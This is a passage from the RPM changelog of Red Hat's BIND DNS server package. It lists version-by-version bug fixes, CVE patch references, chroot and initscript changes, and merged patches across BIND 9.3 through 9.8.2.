CVE-2017-3145\n[32:9.8.2-0.67.rc1]\n- Change EDNS flags only after successful query (#1416035)\n- Fix crash in ldap driver at bind-sdb stop (#1426626)\n[32:9.8.2-0.66.rc1]\n- Fix CVE-2017-3142 and CVE-2017-3143\n[32:9.8.2-0.65.rc1]\n- Update root servers and trust anchors\n[32:9.8.2-0.64.rc1]\n- Fix DNSKEY that encountered a CNAME (#1447872, ISC change 3391)\n[32:9.8.2-0.63.rc1]\n- Fix CVE-2017-3136 (ISC change 4575)\n- Fix CVE-2017-3137 (ISC change 4578)\n[32:9.8.2-0.62.rc1]\n- Fix and test caching CNAME before DNAME (ISC change 4558)\n[32:9.8.2-0.61.rc1]\n- Fix CVE-2016-9147 (ISC change 4510)\n- Fix regression introduced by CVE-2016-8864 (ISC change 4530)\n[32:9.8.2-0.60.rc1]\n- Restore SELinux contexts before named restart\n[32:9.8.2-0.59.rc1]\n- Use /lib or /lib64 only if directory in chroot already exists\n- Tighten NSS library pattern, escape chroot mount path\n[32:9.8.2-0.58.rc1]\n- Fix CVE-2016-8864\n[32:9.8.2-0.57.rc1]\n- Do not change lib permissions in chroot (#1321239)\n- Support WKS records in chroot (#1297562)\n[32:9.8.2-0.56.rc1]\n- Do not include patch backup in docs (fixes #1325081 patch)\n[32:9.8.2-0.55.rc1]\n- Backported relevant parts of [RT #39567] (#1259923)\n[32:9.8.2-0.54.rc1]\n- Increase ISC_SOCKET_MAXEVENTS to 2048 (#1326283)\n[32:9.8.2-0.53.rc1]\n- Fix multiple realms in nsupdate script like upstream (#1313286)\n[32:9.8.2-0.52.rc1]\n- Fix multiple realm in nsupdate script (#1313286)\n[32:9.8.2-0.51.rc1]\n- Use resolver-query-timeout high enough to recover all forwarders (#1325081)\n[32:9.8.2-0.50.rc1]\n- Fix CVE-2016-2848\n[32:9.8.2-0.49.rc1]\n- Fix infinite loop in start_lookup (#1306504)\n[32:9.8.2-0.48.rc1]\n- Fix CVE-2016-2776\n[32:9.8.2-0.47.rc1]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.8.2-0.46.rc1]\n- Fix CVE-2015-8704\n[32:9.8.2-0.45.rc1]\n- Updated named.ca hints file to the latest version (#1267991)\n[32:9.8.2-0.44.rc1]\n- Fix CVE-2015-8000\n[32:9.8.2-0.43.rc1]\n- Fix excessive queries caused by DS chasing with stub zones 
when DNSSEC is not used (#1227189)\n- Added the fixed tarball with configuration to Sources (Related: #1223359)\n[32:9.8.2-0.42.rc1]\n- Don't use ISC's DLV by default (#1223359)\n[32:9.8.2-0.41.rc1]\n- Added support for CAA records (#1252611)\n[32:9.8.2-0.40.rc1]\n- Fix CVE-2015-5722\n[32:9.8.2-0.39.rc1]\n- Fix CVE-2015-5477\n[32:9.8.2-0.38.rc1]\n- Fix CVE-2015-4620\n[32:9.8.2-0.37.rc1]\n- Resolves: 1215687 - DNS resolution failure in high load environment with\n SERVFAIL and 'out of memory/success' in the log\n[32:9.8.2-0.36.rc1]\n- Fix CVE-2015-1349\n[32:9.8.2-0.35.rc1]\n- Enable RPZ-NSIP and RPZ-NSDNAME during compilation (#1176476)\n[32:9.8.2-0.34.rc1]\n- Fix race condition when using isc__begin_beginexclusive (#1175321)\n[32:9.8.2-0.33.rc1]\n- Sanitize SDB API to better handle database errors (#1146893)\n[32:9.8.2-0.32.rc1]\n- Fix CVE-2014-8500 (#1171974)\n[32:9.8.2-0.31.rc1]\n- Fix RRL slip behavior when set to 1 (#1112356)\n- Fix issue causing bind to hang after reload if using DYNDB (#1142152)\n[32:9.8.2-0.30.rc1]\n- Use /dev/urandom when generating rndc.key file (#951255)\n[32:9.8.2-0.29.rc1]\n- Remove bogus file from /usr/share/doc, introduced by fix for bug #1092035\n[32:9.8.2-0.28.rc1]\n- Add support for TLSA resource records (#956685)\n- Increase defaults for lwresd workers and make workers and client objects number configurable (#1092035)\n[32:9.8.2-0.27.rc1]\n- Fix segmentation fault in nsupdate when -r option is used (#1064045)\n- Fix race condition on send buffer in host tool when sending UDP query (#1008827)\n- Allow authentication using TSIG in allow-notify configuration statement (#1044545)\n- Fix SELinux context of /var/named/chroot/etc/localtime (#902431)\n- Include updated named.ca file with root server addresses (#917356)\n- Don't generate rndc.key if there is rndc.conf on start-up (#997743)\n- Fix dig man page regarding how to disable IDN (#1023045)\n- Handle ICMP Destination unreachable (Protocol unreachable) response 
(#1066876)\n[32:9.8.2-0.26.rc1]\n- Configure BIND with --with-dlopen=yes to support dynamically loadable DLZ drivers (#846065)\n- Fix initscript to return correct exit value when calling checkconfig/configtest/check/test (#848033)\n- Don't (un)mount chroot filesystem when running initscript command configtest with running server (#851123)\n- Fix zone2sqlite tool to accept zones containing '.' or '-' or starting with a digit (#919414)\n- Fix initscript not to mount chroot filesystem is named is already running (#948743)\n- Fix initscript to check if the PID in PID-file is really s PID of running named server (#980632)\n- Correct the installed documentation ownership (#1051283)\n[32:9.8.2-0.25.rc1]\n- configure with --enable-filter-aaaa to enable use of filter-aaaa-on-v4 option (#1025008)\n- Fix race condition when destroying a resolver fetch object (#993612)\n- Fix the RRL functionality to include referrals-per-second and nodata-per-second options (#1036700)\n- Fix segfault on SERVFAIL to NXDOMAIN failover (#919545)\n[32:9.8.2-0.24.rc1]\n- Fix CVE-2014-0591\n[32:9.8.2-0.23.rc1]\n- Fix gssapictx memory leak (#911167)\n[32:9.8.2-0.22.rc1]\n- fix CVE-2013-4854\n[32:9.8.2-0.21.rc1]\n- fix CVE-2013-2266\n- ship dns/rrl.h in -devel subpkg\n[32:9.8.2-0.20.rc1]\n- remove one bogus file from /usr/share/doc, introduced by RRL patch\n[32:9.8.2-0.19.rc1]\n- fix CVE-2012-5689\n[32:9.8.2-0.18.rc1]\n- add response rate limit patch (#873624)\n[32:9.8.2-0.17.rc1]\n- fix CVE-2012-5688\n[32:9.8.2-0.16.rc1]\n- initscript: silence spurious 'named.pid: No such file' error\n[32:9.8.2-0.15.rc1]\n- fix CVE-2012-5166\n[32:9.8.2-0.14.rc1]\n- allow forward{,ers} statement in static-stub zones\n[32:9.8.2-0.13.rc1]\n- fix CVE-2012-4244\n[32:9.8.2-0.12.rc1]\n- fix CVE-2012-3817\n[32:9.8.2-0.11.rc1]\n- fix rbtnode.deadlink INSIST failures in rbtdb.c (#837165)\n[32:9.8.2-0.10.rc1]\n- fix CVE-2012-1667\n[32:9.8.2-0.9.rc1]\n- fix race condition in the resolver module\n- nslookup: return non-zero exit 
code when fail to get answer (#816164)\n[32:9.8.2-0.8.rc1]\n- initscript: don't umount /var/named when didn't mount it\n[32:9.8.2-0.7.rc1]\n- don't fail when logfile cannot be opened (#809084)\n[32:9.8.2-0.6.rc1]\n- fix multilib regression in bind-devel (#800053)\n[32:9.8.2-0.5.rc1]\n- fix errors reported by Coverity\n- be more strict when caching NS RRsets (CVE-2012-1033)\n[32:9.8.2-0.4.rc1]\n- load dynamic-db plugins later (#795414)\n[32:9.8.2-0.3.rc1]\n- decrease severity of various errors related to outside DNS environment\n (#788870)\n- fixed various bind-chroot packaging errors (#789886)\n- use portreserve to reserve rndc control port (#790682)\n[32:9.8.2-0.2.rc1]\n- harden dns_zone_setmasterswithkeys() to avoid INSIST failures\n- build with '--enable-fixed-rrset'\n- fix potential memory leak in code which processes rndc authentication\n (#749582)\n- generate rndc.key during (#768798)\n- nslookup: improve handling of AA responses with recursion off\n- removed obsolete bind97-rh714049.patch patch\n[32:9.8.2-0.1.rc1]\n- update to 9.8.2rc1\n- patches merged\n - bind97-rh754398.patch\n - bind97-rh700097.patch\n - bind97-rh734502.patch\n - bind97-rh746694-1.patch\n - bind97-rh746694-2.patch\n - bind97-rh739406-1.patch\n - bind97-rh739406-2.patch\n- ship DNSKEY for root zone in default configuration\n[32:9.7.3-10.P3]\n- disable atomic ops on ppc* because they caused named to hang/crash\n[32:9.7.3-9.P3]\n- fix race condition in resolver.c:validated()\n- improve error handling in zone.c:zone_refreshkeys() to avoid\n hang during shutdown\n[32:9.7.3-8.P3]\n- fix DOS against recursive servers (#754398)\n[32:9.7.3-7.P3]\n- fix memory leak in nsupdate when using SIG(0) keys\n[32:9.7.3-6.P3]\n- load/unload dyndb plugins on appropriate places to avoid crashes (#725577)\n- nsupdate could have failed if server has multiple IPs and the first\n was unreachable (#714049)\n- nsupdate returned zero when target zone didn't exist (#700097)\n- readd configtest target to initscript\n- 
print 'the working directory is not writable' as debug message\n- fix some Coverity warnings\n[32:9.7.3-5.P3]\n- fix rare race condition in request.c\n[32:9.7.3-4.P3]\n- update to 9.7.3-P3 (CVE-2011-2464)\n[32:9.7.3-3.P1]\n- update to 9.7.3-P1 (CVE-2011-1910)\n[32:9.7.3-2]\n- don't generate rndc.key during installation\n[32:9.7.3-1]\n- update to 9.7.3 (CVE-2011-0414)\n- patches merged\n - bind97-gsstsig.patch\n - bind97-rh664401.patch\n - bind97-rh623638.patch\n[32:9.7.2-8.P3]\n- regenerate fixed nsupdate manual page\n[32:9.7.2-7.P3]\n- improve host/dig resolv.conf parser (#rh669163)\n- improve internal test suite\n- don't mention that HMAC-MD5 is the only one TSIG algorighm\n in nsupdate manpage\n- initscript: sybsys name is always named, not named-sdb\n[32:9.7.2-6.P3]\n- named could die on exit after negotiating a GSS-TSIG key (#653486)\n- fix typo in initscript\n[32:9.7.2-5.P3]\n- include root zone DNSKEY in the bind package (#667375)\n[32:9.7.2-4.P3]\n- solve conflict between i686 and x86_64 bind-devel packages (#658045)\n- fix 'service named status' when used with named-sdb\n- fix 'krb5-self' update-policy rule processing (#664401)\n- don't check MD5, size and mtime of sysconfig/named\n[32:9.7.2-3.P3]\n- use same atomic operations on both ppc and ppc64 (#623638)\n- add new option DISABLE_ZONE_CHECKING to sysconfig/named (#623673)\n- document dig exit codes\n- add Requires: bind-libs to bind subpkgs\n- remove statement about system-config-bind from named.8 manpage (#660676)\n[32:9.7.2-2.P3]\n- host utility now honors 'attempts', 'timeout' and 'debug' options in\n resolv.conf (#622764)\n- initscript should kill only the 'correct' named process (#622785)\n- attempt to reconnect to PostgreSQL during each query if the initial\n connection failed (#623190)\n[32:9.7.2-1.P3]\n- update to 9.7.2-P3 (#623122)\n- patch bind97-managed-keyfile.patch replaced by bind97-compat-keysdir.patch\n- patches merged\n - bind97-rh554316.patch\n - 
bind97-rh576906.patch\n[32:9.7.0-5.P2]\n- update to 9.7.0-P2\n[32:9.7.0-4.P1]\n- fix occassional crash on keytable.c:286 (#554316)\n- active query might be destroyed in resume_dslookup() which triggered REQUIRE\n failure (#507429)\n[32:9.7.0-3.P1]\n- update to 9.7.0-P1 release\n[32:9.7.0-2]\n- improve automatic DNSSEC reconfiguration trigger\n- initscript now returns 2 in case that action doesn't exist (#523435)\n- enable/disable chroot when bind-chroot is installed/uninstalled\n[32:9.7.0-1]\n- update to production 9.7.0 release\n[32:9.7.0-0.14.rc2]\n- obsolete dnssec-conf\n- automatically update configuration from old dnssec-conf based\n- improve default configuration; enable DLV by default\n- remove obsolete triggerpostun from bind-libs subpackage\n[32:9.7.0-0.13.rc2]\n- update to 9.7.0rc2 bugfix release (CVE-2010-0097 and CVE-2010-0290)\n[32:9.7.0-0.12.rc1]\n- initscript LSB related fixes (#523435)\n- revert the 'DEBUG' feature (#510283), it causes too many problems (#545128)\n[32:9.7.0-0.11.rc1]\n- disable PKCS11 support. 
PKCS11 support in openssl is not available in RHEL6\n[32:9.7.0-0.10.rc1]\n- update to 9.7.0rc1\n- bind97-headers.patch merged\n- update default configuration\n[32:9.7.0-0.9.b3]\n- update to 9.7.0b3\n[32:9.7.0-0.8.b2]\n- install isc/namespace.h header\n[32:9.7.0-0.7.b2]\n- update to 9.7.0b2\n[32:9.7.0-0.6.b1]\n- update to 9.7.0b1\n- add bind-pkcs11 subpackage to support PKCS11 compatible keystores for DNSSEC\n keys\n[32:9.7.0-0.5.a3]\n- don't package named-bootconf utility, it is very outdated and unneeded\n[32:9.7.0-0.4.a3]\n- determine file size via instead of (#523682)\n[32:9.7.0-0.3.a3]\n- update to 9.7.0a3\n[32:9.7.0-0.2.a2]\n- improve chroot related documentation (#507795)\n- add NetworkManager dispatcher script to reload named when network interface is\n activated/deactivated (#490275)\n- don't set/unset named_write_master_zones SELinux boolean every time in\n initscript, modify it only when it's actually needed\n[32:9.7.0-0.1.a2]\n- update to 9.7.0a2\n- merged patches\n - bind-96-db_unregister.patch\n - 
bind96-rh507469.patch\n[32:9.6.1-9.P1]\n- next attempt to fix the postun trigger (#520385)\n- remove obsolete bind-9.3.1rc1-fix_libbind_includedir.patch\n[32:9.6.1-8.P1]\n- rebuilt with new openssl\n[32:9.6.1-7.P1]\n- update the patch for dynamic loading of database backends\n[32:9.6.1-6.P1]\n- 9.6.1-P1 release (CVE-2009-0696)\n- fix postun trigger (#513016, hopefully)\n[32:9.6.1-5]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n[32:9.6.1-4]\n- remove useless bind-9.3.3rc2-rndckey.patch\n[32:9.6.1-3]\n- fix broken symlinks in bind-libs (#509635)\n- fix typos in /etc/sysconfig/named (#509650)\n- add DEBUG option to /etc/sysconfig/named (#510283)\n[32:9.6.1-2]\n- improved 'chroot automount' patches (#504596)\n- host should fail if specified server doesn't respond (#507469)\n[32:9.6.1-1]\n- 9.6.1 release\n- simplify chroot maintenance. Important files and directories are mounted into\n chroot (see /etc/sysconfig/named for more info, #504596)\n- fix doc/named.conf.default perms\n[32:9.6.1-0.4.rc1]\n- 9.6.1rc1 release\n[32:9.6.1-0.3.b1]\n- update the patch for dynamic loading of database backends\n- create %{_libdir}/bind directory\n- copy default named.conf to doc directory, shared with s-c-bind (atkac)\n[32:9.6.1-0.2.b1]\n- update the patch for dynamic loading of database backends\n- fix dns_db_unregister()\n- useradd now takes '-N' instead of '-n' (atkac, #495726)\n- print nicer error msg when zone file is actually a directory (atkac, #490837)\n[32:9.6.1-0.1.b1]\n- 9.6.1b1 release\n- patches merged\n - bind-96-isc_header.patch\n - bind-95-rh469440.patch\n - bind-96-realloc.patch\n - bind9-fedora-0001.diff\n- use -version-number instead of -version-info libtool param\n[32:9.6.0-11.1.P1]\n- logrotate configuration file now points to /var/named/data/named.run by\n default (#489986)\n[32:9.6.0-11.P1]\n- fall back to insecure mode when no supported DNSSEC algorithm is found\n instead of SERVFAIL\n- don't fall back to non-EDNS0 queries when DO bit is 
set\n[32:9.6.0-10.P1]\n- enable DNSSEC only if it is enabled in sysconfig/dnssec\n[32:9.6.0-9.P1]\n- add DNSSEC support to initscript, enabled it per default\n- add requires dnssec-conf\n[32:9.6.0-8.P1]\n- fire away libbind, it is now separate package\n[32:9.6.0-7.P1]\n- fixed some read buffer overflows (upstream)\n[32:9.6.0-6.P1]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n[32:9.6.0-5.P1]\n- update the patch for dynamic loading of database backends\n- include iterated_hash.h\n[32:9.6.0-4.P1]\n- rebuild for dependencies\n[32:9.6.0-3.P1]\n- rebuild against new openssl\n[32:9.6.0-2.P1]\n- 9.6.0-P1 release (CVE-2009-0025)\n[32:9.6.0-1]\n- Happy new year\n- 9.6.0 release\n[32:9.6.0-0.7.rc2]\n- 9.6.0rc2 release\n- bind-96-rh475120.patch merged\n[32:9.6.0-0.6.rc1]\n- add patch for dynamic loading of database backends\n[32:9.6.0-0.5.1.rc1]\n- allow to reuse address for non-random query-source ports (#475120)\n[32:9.6.0-0.5.rc1]\n- 9.6.0rc1 release\n- patches merged\n - bind-9.2.0rc3-varrun.patch\n - bind-95-sdlz-include.patch\n - bind-96-libxml2.patch\n- fixed rare use-after-free problem in host utility (#452060)\n- enabled chase of DNSSEC signature chains in dig\n[32:9.6.0-0.4.1.b1]\n- improved sample config file (#473586)\n[32:9.6.0-0.4.b1]\n- reverted previous change, koji doesn't like it\n[32:9.6.0-0.3.b1]\n- build bind-chroot as noarch\n[32:9.6.0-0.2.1.b1]\n- updates due libtool 2.2.6\n- don't pass -DLDAP_DEPRECATED to cpp, handle it directly in sources\n[32:9.6.0-0.2.b1]\n- make statistics http server working, patch backported from 9.6 HEAD\n[32:9.6.0-0.1.b1]\n- 9.6.0b1 release\n- don't build ODBC and Berkeley DB DLZ drivers\n- end of bind-chroot-admin script, copy config files to chroot manually\n- /proc doesn't have to be mounted to chroot\n- temporary use libbind from 9.5 series, noone has been released for 9.6 yet\n[32:9.5.1-0.8.4.b2]\n- dig/host: use only IPv4 addresses when -4 option is specified (#469440)\n[32:9.5.1-0.8.2.b2]\n- 
removed unneeded bind-9.4.1-ldap-api.patch\n[32:9.5.1-0.8.1.b2]\n- ship dns/{s,}dlz.h and isc/radix.h in bind-devel\n[32:9.5.1-0.8.b2]\n- removed bind-9.4.0-dnssec-directory.patch, it is wrong\n[32:9.5.1-0.7.b2]\n- 9.5.1b2 release\n- patches merged\n - bind95-rh454783.patch\n - bind-9.5-edns.patch\n - bind95-rh450995.patch\n - bind95-rh457175.patch\n[32:9.5.1-0.6.b1]\n- IDN output strings didn't honour locale settings (#461409)\n[32:9.5.1-0.5.b1]\n- disable transfer stats on DLZ zones (#454783)\n[32:9.5.1-0.4.b1]\n- add forgotten patch for #457175\n- build with -O2\n[32:9.5.1-0.3.b1]\n- static libraries are no longer supported\n- IP acls weren't merged correctly (#457175)\n- use fPIE on sparcv9/sparc64 (Dennis Gilmore)\n- add sparc64 to list of 64bit arches in spec (Dennis Gilmore)\n[32:9.5.1-0.2.b1]\n- updated patches due new rpm (--fuzz=0 patch parameter)\n[32:9.5.1-0.1.1.b1]\n- use %patch0 for Patch0 (#455061)\n- correct source address (#455118)\n[32:9.5.1-0.1.b1]\n- 9.5.1b1 release (CVE-2008-1447)\n- dropped bind-9.5-recv-race.patch because upstream doesn't want it\n[32:9.5.0-37.1]\n- update default named.conf statements (#452708)\n[32:9.5.0-37]\n- some compat changes to fix building on RHEL4\n[32:9.5.0-36.3]\n- fixed typo in %posttrans script\n[32:9.5.0-36.2]\n- parse inner acls correctly (#450995)\n[32:9.5.0-36.1]\n- removed dns-keygen utility in favour of rndc-confgen -a (#449287)\n- some minor sample fixes (#449274)\n[32:9.5.0-36]\n- updated to 9.5.0 final\n- use getifaddrs to find available interfaces\n[32:9.5.0-35.rc1]\n- make /var/run/named writable by named (#448277)\n- fixed one non-utf8 file\n[32:9.5.0-34.rc1]\n- fixes needed to pass package review (#225614)\n[32:9.5.0-33.1.rc1]\n- bind-chroot now depends on bind (#446477)\n[32:9.5.0-33.rc1]\n- updated to 9.5.0rc1\n- merged patches\n - bind-9.5-libcap.patch\n- make binaries readable by others (#427826)\n[32:9.5.0-32.b3]\n- reverted 'any' patch, upstream says not needed\n- log EDNS failure only when we 
really switch to plain EDNS (#275091)\n- detect configuration file better\n[32:9.5.0-31.1.b3]\n- addresses 0.0.0.0 and ::0 really match any (#275091, comment #28)\n[32:9.5.0-31.b3]\n- readded bind-9.5-libcap.patch\n- added bind-9.5-recv-race.patch from F8 branch (#400461)\n[32:9.5.0-30.1.b3]\n- build Berkeley DB DLZ backend\n[32:9.5.0-30.b3]\n- 9.5.0b3 release\n- dropped patches (upstream)\n - bind-9.5-transfer-segv.patch\n - bind-9.5-mudflap.patch\n - bind-9.5.0-generate-xml.patch\n - bind-9.5-libcap.patch\n[32:9.5.0-29.3.b2]\n- fixed named.conf.sample file (#437569)\n[32:9.5.0-29.2.b2]\n- fixed URLs\n[32:9.5.0-29.1.b2]\n- BuildRequires cleanup\n[32:9.5.0-29.b2]\n- rebuild without mudflap (#434159)\n[32:9.5.0-28.b2]\n- port named to use libcap library, enable threads (#433102)\n- removed some unneeded Requires\n[32:9.5.0-27.b2]\n- removed conditional build with libefence (use -fmudflapth instead)\n- fixed building of DLZ stuff (#432497)\n- do not build Berkeley DB DLZ backend\n- temporary build with --disable-linux-caps and without threads (#433102)\n- update named.ca file to affect IPv6 changes in root zone\n[32:9.5.0-26.b2]\n- build with -D_GNU_SOURCE (#431734)\n- improved fix for #253537, posttrans script is now used\n- improved fix for #400461\n- 9.5.0b2\n - bind-9.3.2b1-PIE.patch replaced by bind-9.5-PIE.patch\n - only named, named-sdb and lwresd are PIE\n - bind-9.5-sdb.patch has been updated\n - bind-9.5-libidn.patch has been updated\n - bind-9.4.0-sdb-sqlite-bld.patch replaced by bind-9.5-sdb-sqlite-bld.patch\n - removed bind-9.5-gssapi-header.patch (upstream)\n - removed bind-9.5-CVE-2008-0122.patch (upstream)\n- removed bind-9.2.2-nsl.patch\n- improved sdb_tools Makefile.in\n[32:9.5.0-25.b1]\n- fixed segfault during sending notifies (#400461)\n- rebuild with gcc 4.3 series\n[32:9.5.0-24.b1]\n- removed bind-9.3.2-prctl_set_dumpable.patch (upstream)\n- allow parallel building of libdns library\n- CVE-2008-0122\n[32:9.5.0-23.b1]\n- fixed initscript wait 
loop (#426382)\n- removed dependency on policycoreutils and libselinux (#426515)\n[32:9.5.0-22.b1]\n- fixed regression caused by libidn2 patch (#426348)\n[32:9.5.0-21.b1]\n- fixed typo in post section (CVE-2007-6283)\n[32:9.5.0-20.b1]\n- removed obsoleted triggers\n- CVE-2007-6283\n[32:9.5.0-19.2.b1]\n- added dst/gssapi.h to -devel subpackage (#419091)\n- improved fix for (#417431)\n[32:9.5.0-19.1.b1]\n- fixed shutdown with initscript when rndc doesn't work (#417431)\n- fixed IDN patch (#412241)\n[32:9.5.0-19.b1]\n- 9.5.0b1 (#405281, #392491)\n[32:9.5.0-18.6.a7]\n- Rebuild for deps\n[32:9.5.0-18.5.a7]\n- build with -O0\n[32:9.5.0-18.4.a7]\n- bind-9.5-random_ports.patch was removed because upstream doesn't\n like it. query-source{,v6} options are sufficient (#391931)\n- bind-chroot-admin called restorecon on /proc filesystem (#405281)\n[32:9.5.0-18.3.a7]\n- removed edns patch to keep compatibility with vanilla bind\n (#275091, comment #20)\n[32:9.5.0-18.2.a7]\n- use system port selector instead ISC's (#391931)\n[32:9.5.0-18.a7]\n- removed statement from initscript which passes -D to named\n[32:9.5.0-17.a7]\n- 9.5.0a7\n- dropped patches (upstream)\n - bind-9.5-update.patch\n - bind-9.5-pool_badfree.patch\n - bind-9.5-_res_errno.patch\n[32:9.5.0-16.5.a6]\n- added bind-sdb again, contains SDB modules and DLZ modules\n- bind-9.3.1rc1-sdb.patch replaced by bind-9.5-sdb.patch\n[32:9.5.0-16.4.a6]\n- removed Requires: openldap, postgresql, mysql, db4, unixODBC\n- new L.ROOT-SERVERS.NET address\n[32:9.5.0-16.3.a6]\n- completely disable DBUS\n[32:9.5.0-16.2.a6]\n- minor cleanup in bind-chroot-admin\n[32:9.5.0-16.1.a6]\n- fixed typo in initscript\n[32:9.5.0-16.a6]\n- disabled DBUS (dhcdbd doesn't exist & #339191)\n[32:9.5.0-15.1.a6]\n- fixed missing va_end () functions (#336601)\n- fixed memory leak when dbus initialization fails\n[32:9.5.0-15.a6]\n- corrected named.5 SDB statement (#326051)\n[32:9.5.0-14.a6]\n- added edns patch again (#275091)\n[32:9.5.0-13.a6]\n- removed 
bind-9.3.3-edns.patch patch (see #275091 for reasons)\n[32:9.5.0-12.4.a6]\n- build with O2\n- removed 'autotools' patch\n- bugfixing in bind-chroot-admin (#279901)\n[32:9.5.0-12.a6]\n- bind-9.5-2119_revert.patch and bind-9.5-fix_h_errno.patch are\n obsoleted by upstream bind-9.5-_res_errno.patch\n[32:9.5.0-11.9.a6]\n- fixed wrong resolver's dispatch pool cleanup (#275011, patch from\n tmraz redhat com)\n[32:9.5.0-11.3.a6]\n- initscript failure message is now printed correctly (#277981,\n Quentin Armitage (quentin armitage org uk) )\n[32:9.5.0-11.2.a6]\n- temporary revert ISC 2119 change and add 'libbind-errno' patch\n (#254501) again\n[32:9.5.0-11.1.a6]\n- removed end dots from Summary sections (skasal@redhat.com)\n- fixed wrong file creation by autotools patch (skasal@redhat.com)\n[32:9.5.0-11.a6]\n- start using --disable-isc-spnego configure option\n - remove bind-9.5-spnego-memory_management.patch (source isn't\n compiled)\n[32:9.5.0-10.2.a6]\n- added new initscript option KEYTAB_FILE which specified where\n is located kerberos .keytab file for named service\n- obsolete temporary bind-9.5-spnego-memory_management.patch by\n bind-9.5-gssapictx-free.patch which conforms BIND coding standards\n (#251853)\n[32:9.5.0-10.a6]\n- dropped direct dependency to /etc/openldap/schema directory\n- changed hardcoded paths to macros\n- fired away code which configure LDAP server\n[32:9.5.0-9.1.a6]\n- named could crash with SRV record UPDATE (#251336)\n[32:9.5.0-9.a6]\n- disable 64bit dlz driver patch on alpha and ia64 (#251298)\n- remove wrong malloc functions from lib/dns/spnego.c (#251853)\n[32:9.5.0-8.2.a6]\n- changed licence from BSD-like to ISC\n[32:9.5.0-8.1.a6]\n- disabled named on all runlevels by default\n[32:9.5.0-8.a6]\n- minor next improvements on autotools patch\n- dig and host utilities now using libidn instead idnkit for\n IDN support\n[32:9.5.0-7.a6]\n- binutils/gcc bug rebuild (#249435)\n[32:9.5.0-6.a6]\n- updated to 9.5.0a6 which contains fixes for 
CVE-2007-2925 and\n CVE-2007-2926\n- fixed building on 64bits\n[31:9.5.0a5-5]\n- integrated 'autotools' patch for testing purposes (upstream will\n accept it in future, for easier building)\n[31:9.5.0a5-4.1]\n- fixed DLZ drivers building on 64bit systems\n[31:9.5.0a5-4]\n- fixed relation between logrotated and chroot-ed named\n[31:9.5.0a5-3.9]\n- removed bind-sdb package (default named has compiled SDB backend now)\n- integrated DLZ (Dynamically loadable zones) drivers\n- integrated GSS-TSIG support (RFC 3645)\n- build with -O0 (many new features, potential core dumps will be more useful)\n[31:9.5.0a5-3.2]\n- initscript should be ready for parallel booting (#246878)\n[31:9.5.0a5-3]\n- handle integer overflow in isc_time_secondsastimet function gracefully (#247856)\n[31:9.5.0a5-2.2]\n- moved chroot configfiles into chroot subpackage (#248306)\n[31:9.5.0a5-2]\n- minor changes in default configuration\n- fix h_errno assigment during resolver initialization (unbounded recursion, #245857)\n- removed wrong patch to #150288\n[31:9.5.0a5-1]\n- updated to latest upstream\n[31:9.4.1-7]\n- marked caching-nameserver as obsolete (#244604)\n- fixed typo in initscript (causes that named doesn't detect NetworkManager\n correctly)\n- next cleanup in configuration - moved configfiles into config.tar\n- removed delay between start & stop in restart function in named.init\n[31:9.4.1-6]\n- major changes in initscript. Could be LSB compatible now\n- removed caching-nameserver subpackage. Move configs from this\n package to main bind package as default configuration and major\n configuration cleanup\n[31:9.4.1-5]\n- very minor compatibility change in bind-chroot-admin (line 215)\n- enabled IDN support by default and don't distribute IDN libraries\n- specfile cleanup\n- add dynamic directory to /var/named. This directory will be primarily used for\n dynamic DNS zones. 
ENABLE_ZONE_WRITE and SELinux's named_write_master_zones no longer exist\n[31:9.4.1-4]\n- removed ldap-api patch and start using deprecated API\n- fixed minor problem in bind-chroot-admin script (#241103)\n[31:9.4.1-3]\n- fixed bind-chroot-admin dynamic DNS handling (#239149)\n- updated zone-freeze patch to latest upstream\n- ldap sdb has been rewriten to latest api (#239802)\n[31:9.4.1-2.fc7]\n- test build on new build system\n[31:9.4.1-1.fc7]\n- updated to 9.4.1 which contains fix to CVE-2007-2241\n[31:9.4.0-8.fc7]\n- improved 'zone freeze patch' - if multiple zone with same name exists\n no zone is freezed\n- minor cleanup in caching-nameserver's config file\n- fixed race-condition in dbus code (#235809)\n- added forgotten restorecon statement in bind-chroot-admin\n[31:9.4.0-7.fc7]\n- removed DEBUGINFO option because with this option (default) was bind\n builded with -O0 and without this flag no debuginfo package was produced.\n (I want faster bind => -O2 + debuginfo)\n- fixed zone finding (#236426)\n[31:9.4.0-6.fc7]\n- added idn support (still under development with upstream, disabled by default)\n[31:9.4.0-5.fc7]\n- dnssec-signzone utility now doesn't ignore -d parameter\n[31:9.4.0-4.fc7]\n- removed query-source[-v6] options from caching-nameserver config\n (#209954, increase security)\n- throw away idn. 
It won't be ready in fc7\n[31:9.4.0-3.fc7]\n- prepared bind to merge review\n- added experimental idn support to bind-utils utils (not enabled by default yet)\n- change chroot policy in caching-nameserver post section\n- fixed bug in bind-chroot-admin - rootdir function is called properly now\n[31:9.4.0-2.fc7]\n- added experimental SQLite support (written by John Boyd \n)\n- moved bind-chroot-admin script to chroot package\n- bind-9.3.2-redhat_doc.patch is always applied (#231738)\n[31:9.4.0-1.fc7]\n- updated to 9.4.0\n- bind-chroot-admin now sets EAs correctly (#213926)\n- throw away next_server_on_referral and no_servfail_stops patches (fixed in 9.4.0)\n[31:9.3.4-7.fc7]\n- minor cleanup in bind-chroot-admin script\n[31:9.3.4-6.fc7]\n- fixed broken bind-chroot-admin script (#227995)\n[31:9.3.4-5.fc7]\n- bind-chroot-admin now uses correct chroot path (#227600)\n[31:9.3.4-4.fc7]\n- fixed conflict between bind-sdb and ldap\n- removed duplicated bind directory in bind-libs\n[31:9.3.4-3.fc7]\n- fixed building without libbind\n- fixed post section (selinux commands is now in if-endif statement)\n- prever macro has been removed from version\n[31:9.3.4-2.fc7]\n- redirected output from bind-chroot prep and %preun stages to /dev/null\n[31:9.3.4-1.fc7]\n- updated to version 9.3.4 which contains security bugfixes\n[31:9.3.3-5.fc7]\n- package bind-libbind-devel has been marked as obsolete\n[31:9.3.3-4.fc7]\n- package bind-libbind-devel has beed removed (libs has been moved to bind-devel & bind-libs)\n- Resolves: #214208\n[31:9.3.3-3]\n- fixed a multi-lib issue\n- Resolves: rhbz#222717\n[31:9.3.3-2]\n- added namedGetForwarders written in shell (#176100),\n created by Baris Cicek \n.\n[31:9.3.3-1]\n- update to 9.3.3 final\n- fix for #219069: file included twice in src.rpm\n[31:9.3.3-0.1.rc3]\n- added back an interval to restart\n- renamed package, it should meet the N-V-R criteria\n- fix for #216185: bind-chroot-admin able to change root mode 750\n- added fix from #215997: 
